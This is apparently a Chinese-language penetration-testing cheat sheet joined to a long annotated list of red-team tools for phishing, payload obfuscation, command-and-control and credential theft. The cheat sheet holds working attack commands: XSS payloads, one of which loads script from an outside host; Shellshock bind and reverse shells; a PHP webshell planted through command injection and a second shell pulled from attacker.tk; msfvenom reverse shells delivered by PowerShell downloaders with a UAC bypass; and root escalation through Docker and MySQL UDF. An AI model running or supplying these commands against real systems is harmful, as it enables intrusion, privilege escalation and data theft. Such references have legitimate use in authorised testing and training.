    <IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
    <IMG SRC="jav ascript:alert('XSS');">
    
    perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out
    
    <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    
    (">< iframes http://google.com < iframes >)
    
    <BODY BACKGROUND="javascript:alert('XSS')">
    <FRAMESET><FRAME SRC=”javascript:alert('XSS');"></FRAMESET>
    "><script >alert(document.cookie)</script>
    %253cscript%253ealert(document.cookie)%253c/script%253e
    "><s"%2b"cript>alert(document.cookie)</script>
    %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
    <img src=asdf onerror=alert(document.cookie)>
    

    SSH Over SCTP (使用 Socat)

    # 远端服务器
    # 假设你准备让 SCTP socket 监听端口 80/SCTP 并且 sshd 端口在 22/TCP
    $ socat SCTP-LISTEN:80,fork TCP:localhost:22
    
    # 本地端
    # 将 SERVER_IP 换成远端服务器的地址,然后将 80 换成 SCTP 监听的端口号
    $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
    
    # 创建 socks 代理
    # 替换 username 和 -p 的端口号
    $ ssh -lusername localhost -D 8080 -p 1337
    

    使用洋葱网络

    # 安装服务
    $ apt-get install tor torsocks
    
    # 绑定 ssh 到 tor 服务端口 80
    # /etc/tor/torrc
    SocksPolicy accept 127.0.0.1
    SocksPolicy accept 192.168.0.0/16
    Log notice file /var/log/tor/notices.log
    RunAsDaemon 1
    HiddenServiceDir /var/lib/tor/ssh_hidden_service/
    HiddenServicePort 80 127.0.0.1:22
    PublishServerDescriptor 0
    $ /etc/init.d/tor start
    $ cat /var/lib/tor/ssh_hidden_service/hostname
    3l5zstvt1zk5jhl662.onion
    
    # ssh 客户端连接
    $ apt-get install torsocks
    $ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80
    

    Metagoofil – 元数据收集工具

    注:Metagoofil 是一款利用Google收集信息的工具。

    # http://www.edge-security.com/metagoofil.php
    # 它可以自动在搜素引擎中检索和分析文件,还具有提供Mac地址,用户名列表等其他功能
    $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
    

    利用 Shellshock

    # 一个发现并利用服务器 Shellshock 的工具
    # https://github.com/nccgroup/shocker
    $ ./shocker.py -H 192.168.56.118  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
    
    # 查看文件
    $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
    
    # 绑定 shell
    $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
    
    # 反弹 Shell
    $ nc -l -p 443
    $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
    

    获取 Docker 的 Root

    # 获取  Docker 的 Root
    # user 必须在 docker 用户组中
    ek@victum:~/docker-test$ id
    uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
    
    ek@victum:~$ mkdir docker-test
    ek@victum:~$ cd docker-test
    
    ek@victum:~$ cat > Dockerfile
    FROM debian:wheezy
    
    ENV WORKDIR /stuff
    
    RUN mkdir -p $WORKDIR
    
    VOLUME [ $WORKDIR ]
    
    WORKDIR $WORKDIR
    << EOF
    
    ek@victum:~$ docker build -t my-docker-image .
    ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
    'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
    ./sh
    whoami
    # root
    
    ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'
    

    使用 DNS 隧道绕过防火墙

    # 让数据和命令使用 DNS 隧道传输以绕过防火墙的检查
    # dnscat2 支持从目标主机上面上传和下载命令来获取文件、数据和程序
    
    # 服务器 (攻击者)
    $ apt-get update
    $ apt-get -y install ruby-dev git make g++
    $ gem install bundler
    $ git clone https://github.com/iagox86/dnscat2.git
    $ cd dnscat2/server
    $ bundle install
    $ ruby ./dnscat2.rb
    dnscat2> New session established: 16059
    dnscat2> session -i 16059
    
    # 客户机 (目标)
    # https://downloads.skullsecurity.org/dnscat2/
    # https://github.com/lukebaggett/dnscat2-powershell
    $ dnscat --host <dnscat server_ip>
    

    编译 Assemble 代码

    $ nasm -f elf32 simple32.asm -o simple32.o
    $ ld -m elf_i386 simple32.o simple32
    
    $ nasm -f elf64 simple.asm -o simple.o
    $ ld simple.o -o simple
    

    使用非交互 Shell 打入内网

    # 生成 shell 使用的 ssh 密钥
    $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami"
    $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" "
    $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"
    
    # 增加用户 tempuser 
    $ useradd -m tempuser
    $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
    $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys
    $ chmod 700 /home/tempuser/.ssh/authorized_keys
    $ chown -R tempuser:tempuser /home/tempuser/.ssh
    
    # 反弹 ssh shell
    $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
    

    利用 POST 远程命令执行获取 Shell

    attacker:~$ curl -i -s -k  -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'
    
    attacker:~$ curl -i -s -k  -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'
    
    attacker:~$ curl http://victum.tk/shell.php?cmd=id
    
    # 在服务器上下载 shell (phpshell.php)
    
    http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27
    
    # 运行 nc 并执行 phpshell.php
    attacker:~$ nc -nvlp 1337
    

    以管理员身份在 Win7 上反弹具有系统权限的 Shell

    msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
    
    # 显示账户配置
    net user <login>
    
    # Kali 上下载 psexec
    
    https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
    
    # 使用 powershell 脚本上传 psexec.exe 到目标机器
    echo $client = New-Object System.Net.WebClient > script.ps1
    echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
    echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
    
    # 使用 powershell 脚本上传 danger.exe 到目标机器
    echo $client = New-Object System.Net.WebClient > script2.ps1
    echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1
    echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
    
    # 使用预编译的二进制文件绕过 UAC:
    
    https://github.com/hfiref0x/UACME
    
    # 使用 powershell 脚本上传 https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe 到目标机器
    echo $client = New-Object System.Net.WebClient > script2.ps1
    echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1
    echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
    
    # 在 Kali 上创建监听
    nc -lvp 4444
    
    # 以系统权限使用 Akagi64 运行 danger.exe 
    Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
    
    # 在 Kali 上创建监听
    nc -lvp 4444
    
    # 下一步就会反弹给我们一个提过权的 shell
    # 以系统权限使用 PsExec 运行 danger.exe 
    psexec.exe –i –d –accepteula –s danger.exe
    

    以普通用户身份在 Win7 上反弹具有系统权限的 Shell

    https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051
    
    https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
    
    
    https://www.exploit-db.com/exploits/37049/
    
    # 查找目标机器是否安装了补丁,输入如下命令
    wmic qfe get
    wmic qfe | find "3057191"
    
    # 上传编译后的利用程序并运行它
    
    https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
    
    # 默认情况下其会以系统权限执行 cmd.exe,但我们需要改变源代码以运行我们上传的 danger.exe
    # https://github.com/hfiref0x/CVE-2015-1701 下载它并定位到 "main.c"
    
    # 使用 wce.exe 获取已登录用户的明文账号密码
    
    http://www.ampliasecurity.com/research/windows-credentials-editor/
    
    wce -w
    
    # 使用 pwdump7 获取其他用户的密码哈希值
    
    http://www.heise.de/download/pwdump.html
    
    # we can try online hash cracking tools such crackstation.net
    

    MS08-067 – 不使用 Metasploit

    $ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205
    $ searchsploit ms08-067
    $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
    

    通过 MySQL Root 账户实现提权

    # Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
    $ wget 0xdeadbeef.info/exploits/raptor_udf2.c
    $ gcc -g -c raptor_udf2.c
    $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    mysql -u root -p
    mysql> use mysql;
    mysql> create table foo(line blob);
    mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
    mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
    mysql> create function do_system returns integer soname 'raptor_udf2.so';
    mysql> select * from mysql.func;
    mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');
    
    user:~$ su -
    Password:
    user:~# whoami
    root
    root:~# id
    uid=0(root) gid=0(root) groups=0(root)
    

    使用 LD_PRELOAD 注入程序

    $ wget https://github.com/jivoi/pentest/ldpreload_shell.c
    $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
    $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
    

    针对 OpenSSH 用户进行枚举时序攻击

    注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就是“旁敲侧击”。–参考自 shotgun 在知乎上的解释。

    osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。

    # https://github.com/c0r3dump3d/osueta
    $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
    $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
    

    使用 ReDuh 构造合法的 HTTP 请求以建立 TCP 通道

    注: ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

    对了亲~ReDuh-Gui 号称端口转发神器哦。

    # https://github.com/sensepost/reDuh
    
    # 步骤 1
    # 上传 reDuh.jsp 目标服务器
    $ http://192.168.10.50/uploads/reDuh.jsp
    
    # 步骤 2
    # 在本机运行 reDuhClient 
    $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
    
    # 步骤 3
    # 使用 nc 连接管理端口
    $ nc -nvv 127.0.0.1 1010
    
    # 步骤 4
    # 使用隧道转发本地端口到远程目标端口
    [createTunnel] 7777:172.16.0.4:3389
    
    # 步骤 5
    # 使用 RDP 连接远程
    $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777





    展开全文
  • 适用于渗透测试不同阶段的工具收集整理 内容 侦察 武器化 交货 命令与控制 横向运动 建立立足点 升级特权 数据泄露 杂项 参考 该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果...

    适用于渗透测试不同阶段的工具收集整理

    内容

    • 侦察
    • 武器化
    • 交货
    • 命令与控制
    • 横向运动
    • 建立立足点
    • 升级特权
    • 数据泄露
    • 杂项
    • 参考

    该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。

    68747470733a2f2f75706c6f6164732d73736c2e776562666c6f772e636f6d2f3538383636636165616263383364356537633537346337312f3538626534333132646331336239646537343638363132615f5265642d5465616d2d41747461636b2d4c6966656379636c652e6a7.jpg

    侦察

    主动情报收集

    EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitness

    AWSBucketDump:AWS S3安全扫描工具,允许你快速枚举AWS S3 buckets以查找有趣或机密的文件。https://github.com/jordanpotti/AWSBucketDump

    AQUATONE:子域名枚举探测工具。https://github.com/michenriksen/aquatone

    spoofcheck:检查域是否可以被欺骗。它会检查SPF和DMARC记录是否存在允许欺骗的弱配置。https://github.com/BishopFox/spoofcheck

    Nmap:用于发现计算机网络上的主机和服务。https://github.com/nmap/nmap

    dnsrecon:DNS枚举脚本。https://github.com/darkoperator/dnsrecon

    被动情报收集

    skiptracer:OSINT爬虫框架,利用PII paywall网站的一些基本python webscraping (BeautifulSoup) 来被动信息收集。https://github.com/xillwillx/skiptracer

    ScrapedIn:用于爬取LinkedIn的工具,不受API数据侦察的限制。https://github.com/dchrastil/ScrapedIn

    FOCA:主要用于在其扫描的文档中查找元数据和隐藏信息的工具。https://github.com/ElevenPaths/FOCA

    The Harvester:是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息。https://github.com/laramies/theHarvester

    Metagoofil:提取目标网站可用公共文档(如pdf,doc,xls,ppt等)元数据的工具。https://github.com/laramies/metagoofil

    SimplyEmail:快速而简单的电子邮件侦察工具。https://github.com/killswitch-GUI/SimplyEmail

    truffleHog:帮助开发人员检测他们在GitHub上发布的项目是否已经不小心泄漏了任何秘密密钥。https://github.com/dxa4481/truffleHog

    Just-Metadata:一个收集和分析有关IP地址元数据的工具,并试图找到大型数据集内系统之间的关系。https://github.com/ChrisTruncer/Just-Metadata

    typofinder:域名拼写错误检索工具。https://github.com/nccgroup/typofinder

    框架

    Maltego:一款十分适合渗透测试人员和取证分析人员的优秀工具,其主要功能是开源情报收集和取证。https://www.paterva.com/web7/downloads.php

    SpiderFoot:免费开源的网站信息收集类工具。https://github.com/smicallef/spiderfoot

    datasploit:OSINT框架,用于对公司,人员,电话号码,比特币地址等执行各种侦察技术,汇总所有原始数据,并以多种格式提供数据。https://github.com/DataSploit/datasploit

    Recon-ng:Python编写的全功能Web侦察框架。https://bitbucket.org/LaNMaSteR53/recon-ng

    武器化

    Composite MonikerCVE-2017-8570 PoC。https://github.com/rxwx/CVE-2017-8570

    Exploit toolkit CVE-2017-8759:一个方便的python脚本,它为测试者和安全研究人员提供了一种快速有效的方式来测试Microsoft .NET Framework RCE。https://github.com/bhdresh/CVE-2017-8759

    CVE-2017-11882 Exploit:最多接受超过17k字节长度的命令/代码。https://github.com/unamer/CVE-2017-11882

    Adobe Flash Exploit:CVE-2018-4878。https://github.com/anbai-inc/CVE-2018-4878

    Exploit toolkit CVE-2017-0199:一个方便的python脚本,它为测试人员和安全研究人员提供了一种快速有效的方式来测试Microsoft Office RCE。https://github.com/bhdresh/CVE-2017-0199

    demiguise:HTA加密工具。https://github.com/nccgroup/demiguise

    Office-DDE-Payloads:收集脚本和模板以生成嵌入DDE的Office文档,无宏命令执行技术。https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

    CACTUSTORCH:是一个生成payload的框架,可用于基于James Forshaw的DotNetToJScript工具的攻防对抗。https://github.com/mdsecactivebreach/CACTUSTORCH

    SharpShooter:用于检索和执行任意CSharp源码的payload创建框架。https://github.com/mdsecactivebreach/SharpShooter

    Don’t kill my cat:用于生成被存储在polyglot图像中的混淆shellcode。https://github.com/Mr-Un1k0d3r/DKMC

    Malicious Macro Generator Utility:生成混淆宏,其中还包括AV/Sandboxes逃避机制。https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator

    SCT Obfuscator:Cobalt Strike SCT有效载荷混淆器。https://github.com/Mr-Un1k0d3r/SCT-obfuscator

    Invoke-Obfuscation:PowerShell混淆器。https://github.com/danielbohannon/Invoke-Obfuscation

    Invoke-DOSfuscation:powershell混淆编码框架。https://github.com/danielbohannon/Invoke-DOSfuscation

    Unicorn:使用PowerShell降级攻击并将shellcode直接注入内存的工具。https://github.com/trustedsec/unicorn

    Shellter:一个动态的shellcode注入工具,也是有史以来第一个真正动态的PE注入工具。https://www.shellterproject.com/

    SigThief:是一个由python编写的,可以用于劫持合法的数字签名并绕过Windows的哈希验证机制的脚本工具。https://github.com/secretsquirrel/SigThief

    Veil:用于生成绕过常用AV的metasploit有效载荷的工具。https://github.com/Veil-Framework/Veil

    CheckPlease:用PowerShell,Python,Go,Ruby,C,C#,Perl和Rust编写的CheckPlease Sandbox evasion模块。https://github.com/Arvanaghi/CheckPlease

    Invoke-PSImage:将目标PS脚本嵌入到一个PNG图片文件的像素点中,并允许我们使用一行指令来执行该脚本。https://github.com/peewpw/Invoke-PSImage

    LuckyStrike:基于PowerShell的实用程序,用于创建恶意的Office宏文档。仅用于渗透测试或教育目的。https://github.com/curi0usJack/luckystrike

    ClickOnceGenerator:适用于红队的快速恶意ClickOnce生成器。https://github.com/Mr-Un1k0d3r/ClickOnceGenerator

    macro_pack:一个用于自动生成混淆过的MS Office文档、VB脚本等其他格式的工具,其主要目的是用于渗透测试、demo以及社会工程学的评估。https://github.com/sevagas/macro_pack

    StarFighters:基于JavaScript和VBScript的Empire启动器。https://github.com/Cn33liz/StarFighters

    nps_payload:专为逃避入侵检测而生成Payload的工具。https://github.com/trustedsec/nps_payload

    SocialEngineering:负责收集用于证书盗窃和鱼叉式网络钓鱼攻击的社交工程技巧和payloads。https://github.com/bhdresh/SocialEngineeringPayloads

    Social-Engineer Toolkit:一款专为社交工程设计的开源渗透测试框架。https://github.com/trustedsec/social-engineer-toolkit

    Phishery:一个支持SSL简单的HTTP服务器。https://github.com/ryhanson/phishery

    PowerShdll:使用rundll32运行PowerShell。绕过软件限制。https://github.com/p3nt4/PowerShdll

    Ultimate AppLocker ByPass List:常用AppLocker绕过技术存储库。https://github.com/api0cradle/UltimateAppLockerByPassList

    Ruler:是一款能够通过MAPI/HTTP协议与Exchange服务器交互的工具。https://github.com/sensepost/ruler

    Generate-Macro:一个独立的PowerShell脚本,它将生成具有指定有效负载和持久性方法的恶意Microsoft Office文档。https://github.com/enigma0x3/Generate-Macro

    Malicious Macro MSBuild Generator :生成恶意宏并通过MSBuild应用程序白名单绕过执行Powershell或Shellcode。https://github.com/infosecn1nja/MaliciousMacroMSBuild

    Meta Twin:一个文件资源克隆器。从一个文件中提取元数据,包括数字签名,并注入到另一个文件中。https://github.com/threatexpress/metatwin

    WePWNise:生成独立于体系结构的VBA代码,用于Office文档或模板,并自动绕过应用程序控制。https://github.com/mwrlabs/wePWNise

    DotNetToJScript:能够利用JS/Vbs脚本加载.Net程序的工具。https://github.com/tyranid/DotNetToJScript

    PSAmsi:一个审计和攻击 AMSI 签名的工具。https://github.com/cobbr/PSAmsi

    Reflective DLL injection:是一种库注入技术,让DLL自身不使用LoadLibraryA函数,将自身映射到目标进程内存中。https://github.com/stephenfewer/ReflectiveDLLInjection

    ps1encode:用于生成和编码基于powershell的metasploit有效载荷。https://github.com/CroweCybersecurity/ps1encode

    Worse PDF:将一个普通的PDF文件变成恶意文件。用于从Windows机器上窃取Net-NTLM哈希。https://github.com/3gstudent/Worse-PDF

    SpookFlare:一款可帮助你有机会绕过各种安全措施的工具,例如客户端检测和网络端检测的端点策略。SpookFlare还是Meterpreter,Empire,Koadic等的loader/dropper生成器。https://github.com/hlldz/SpookFlare

    GreatEST:是一个生成应用程序白名单绕过的开源项目。此工具适用于红蓝对抗。https://github.com/GreatSCT/GreatSCT

    nps:运行没有PowerShell的PowerShell。https://github.com/Ben0xA/nps

    Meterpreter_Paranoid_Mode.sh:一个可以创建SSL/TLS shell连接的脚本。https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL

    The Backdoor Factory:一款安全测试工具,可以轻松的生成win32PE后门测试程序,ELF文件后门程序等。https://github.com/secretsquirrel/the-backdoor-factory

    MacroShop:一组脚本,通过Office宏传递有效载荷。https://github.com/khr0x40sh/MacroShop

    UnmanagedPowerShell:可以从一个非托管程序来执行PowerShell , 经过一些修改后也可以被用来注入到其他进程。https://github.com/leechristensen/UnmanagedPowerShell

    Delivery

    钓鱼

    King Phisher:一款专业的钓鱼活动工具包。https://github.com/securestate/king-phisher

    FiercePhish:是一个管理所有钓鱼攻击的完整钓鱼框架 ,允许你跟踪单独的网络钓鱼活动,定时发送电子邮件等。https://github.com/Raikia/FiercePhish

    ReelPhish:是一个实时双因素网络钓鱼工具。https://github.com/fireeye/ReelPhish/

    Gophish:是一款专为企业和渗透测试人员设计的开源钓鱼攻击工具包。https://github.com/gophish/gophish

    CredSniper:是一个使用Python微型框架Flask和Jinja2模板编写的网络钓鱼框架,支持捕获2FA令牌。https://github.com/ustayready/CredSniper

    PwnAuth:一个让组织和渗透测试人员能够拥有测试其检测和响应OAuth滥用社会工程活动能力的平台。https://github.com/fireeye/PwnAuth

    Phishing Frenzy:一个开源的钓鱼测试工具。https://github.com/pentestgeek/phishing-frenzy

    水坑攻击

    BeEF:一款针对浏览器的渗透测试工具。https://github.com/beefproject/beef

    命令与控制

    远程访问工具

    Cobalt Strike:一款非常优秀的后渗透平台。https://cobaltstrike.com/

    Empire:一个纯碎的PowerShell后期漏洞利用代理工具。https://github.com/EmpireProject/Empire

    Metasploit Framework:一个软件漏洞利用框架。https://github.com/rapid7/metasploit-framework

    Pupy:是一个基于python的开源跨平台(Windows,Linux,OSX,Android)远程管理和后期利用工具。https://github.com/n1nj4sec/pupy

    Koadic:DEFCON上的一个后渗透工具,一款js/vbs远控,模块也蛮多的,涉及的功能也很全面。https://github.com/zerosum0x0/koadic

    PoshC2:一款基于PowerShell和C#的命令控制工具。https://github.com/nettitude/PoshC2

    Gcat:是一款使用Gmail控制管理的Python隐形后门。https://github.com/byt3bl33d3r/gcat

    TrevorC2:是一个合法的网站(可浏览),用于隐藏命令执行的客户端/服务器通信。https://github.com/trustedsec/trevorc2

    Merlin:是一个用Go语言编写的跨平台后期利用HTTP/2命令与控制服务器和代理( agent )。https://github.com/Ne0nd0g/merlin

    Quasar:一个用C#编码的快速轻量级远程管理工具。https://github.com/quasar/QuasarRAT

    Staging

    Red Baron:是Terraform的一组模块和定制/第三方提供商,它试图为红队自动创建弹性,一次性,安全和灵活的基础架构。https://github.com/Coalfire-Research/Red-Baron

    EvilURL:为IDN同形异义字攻击生成unicode域名并检测它们。https://github.com/UndeadSec/EvilURL

    Domain Hunter:检查过期域名,bluecoat分类和Archive.org历史记录,以确定最为适合于钓鱼和C2的域名。https://github.com/threatexpress/domainhunter

    PowerDNS:一个简单的PoC,用于演示如何使用DNS执行PowerShell脚本。https://github.com/mdsecactivebreach/PowerDNS

    Chameleon:帮助红队将其基础架构分类为任意类别的工具。https://github.com/mdsecactivebreach/Chameleon

    CatMyFish:搜索分类域。 为你的Cobalt Strike beacon C&C设置白名单域。https://github.com/Mr-Un1k0d3r/CatMyFish

    Malleable C2:用于重新定义Beacon通信中的指标。https://github.com/rsmudge/Malleable-C2-Profiles

    Malleable-C2-Randomizer:该脚本通过使用元语言随机化Cobalt Strike Malleable C2配置文件,从而最大程度上的减少基于签名的检测控制机会。https://github.com/bluscreenofjeff/Malleable-C2-Randomizer

    FindFrontableDomains:搜索潜在的frontable域。https://github.com/rvrsh3ll/FindFrontableDomains

    Postfix-Server-Setup:自动化建立一个网络钓鱼服务器。https://github.com/n0pe-sled/Postfix-Server-Setup

    DomainFronting:根据CDN列出Domain Frontable域列表。https://github.com/vysec/DomainFrontingLists

    Apache2-Mod_rewrite-Setup:快速在你的基础架构中实现Mod_rewrite。https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup

    mod_rewrite:沙箱逃逸。https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10

    external_c2 framework:允许我们使用beacon数据包并通过可选端口与Team Server进行交互。https://github.com/Und3rf10w/external_c2_framework

    ExternalC2:一个用于将通信渠道与Cobalt Strike External C2服务器集成的库。https://github.com/ryhanson/ExternalC2

    cs2 mod_rewrite:用于将Cobalt Strike配置文件转换为mod_rewrite脚本的工具。https://github.com/threatexpress/cs2modrewrite

    e2modrewrite:用于将Empire配置文件转换为Apache modrewrite脚本。https://github.com/infosecn1nja/e2modrewrite

    Domain Fronting Google App Engine:一个云平台,允许用户构建和部署自制的Web 和 移动应用程序,它相当于一个介于应用程序和云基础设施之间的抽象层。https://github.com/redteam-cyberark/Google-Domain-fronting

    使用NGINX提供随机Payload。https://gist.github.com/jivoi/a33ace2e25515a31aa2ffbae246d98c9

    Empire自动任务执行。https://github.com/bneg/RedTeam-Automation

    meek:Tor的一种传输插件,它将数据流编码为一系列HTTPS请求和响应。https://github.com/arlolra/meek

    CobaltStrike-ToolKit :一些实用的obaltStrike脚本。https://github.com/killswitch-GUI/CobaltStrike-ToolKit

    内网漫游

    CrackMapExec:使用Python编写的一款工具,堪称Windows活动目录/域环境渗透测试里的一把瑞士军刀。https://github.com/byt3bl33d3r/CrackMapExec

    PowerLessShell:在不调用PowerShell.exe的情况下执行PowerShell脚本。https://github.com/Mr-Un1k0d3r/PowerLessShell

    GoFetch:是一个自动执行由BloodHound应用程序生成的攻击计划的工具。https://github.com/GoFetchAD/GoFetch

    ANGRY PUPPY:Cobalt Strike中bloodhound攻击路径自动化。https://github.com/vysec/ANGRYPUPPY

    DeathStar:一键自动化域渗透工具。https://github.com/byt3bl33d3r/DeathStar

    SharpHound:C#重写BloodHound Ingestor。https://github.com/BloodHoundAD/SharpHound

    Responder:可用于嗅探网络内所有的LLMNR包,获取各个主机的信息,还可以发起欺骗,诱骗发起请求的主机访问错误主机的工具。https://github.com/SpiderLabs/Responder

    SessionGopher:是一个PowerShell工具,它使用WMI为远程访问工具(如WinSCP,PuTTY,SuperPuTTY,FileZilla和Microsoft远程桌面)提取保存的会话信息。该工具支持远程或本地运行。https://github.com/fireeye/SessionGopher

    PowerSploit:GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。https://github.com/PowerShellMafia/PowerSploit

    Nishang:一款针对PowerShell的渗透工具。https://github.com/samratashok/nishang

    Inveigh:是一款Windows PowerShell的LLMNR/NBNS协议欺骗/中间人工具。https://github.com/Kevin-Robertson/Inveigh

    PowerUpSQL:攻击SQL SERVER的Powershell脚本框架。https://github.com/NetSPI/PowerUpSQL

    MailSniper:Exchange敏感数据检索工具。https://github.com/dafthack/MailSniper

    WMIOps:PowerShell脚本,它使用WMI在Windows环境中的本地或远程主机上执行各种操作。https://github.com/ChrisTruncer/WMIOps

    Mimikatz :一款获取windows密码的工具。https://github.com/gentilkiwi/mimikatz

    LaZagne:一款用于检索大量存储在本地计算机密码的开源应用程序。https://github.com/AlessandroZ/LaZagne

    mimipenguin :一款Linux下的密码抓取神器。https://github.com/huntergregal/mimipenguin

    PsExec:是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

    KeeThief:允许你从内存中提取KeePass 2.X key material的工具。https://github.com/HarmJ0y/KeeThief

    PSAttack:一个开源的,将渗透测试实践过程中所有的脚本结合起来形成的框架。https://github.com/jaredhaight/PSAttack

    Internal Monologue攻击:在不触碰LSASS的情况下抓取 NTLM Hashes 的攻击方式。https://github.com/eladshamir/Internal-Monologue

    Impacket:网络协议工具包。https://github.com/CoreSecurity/impacket

    ADRecon:AD环境侦察工具。https://github.com/sense-of-security/ADRecon

    icebreaker:如果你当前处于内网环境但又在AD环境之外,icebreaker将会帮助你获取明文Active Directory凭据。https://github.com/DanMcInerney/icebreaker

    WSUSpendu:该脚本是由法国研究人员开发的,有了它渗透测试人员可以自主创建恶意更新,并将其注入到WSUS服务器数据库中随意的分发这些恶意更新。https://github.com/AlsidOfficial/WSUSpendu

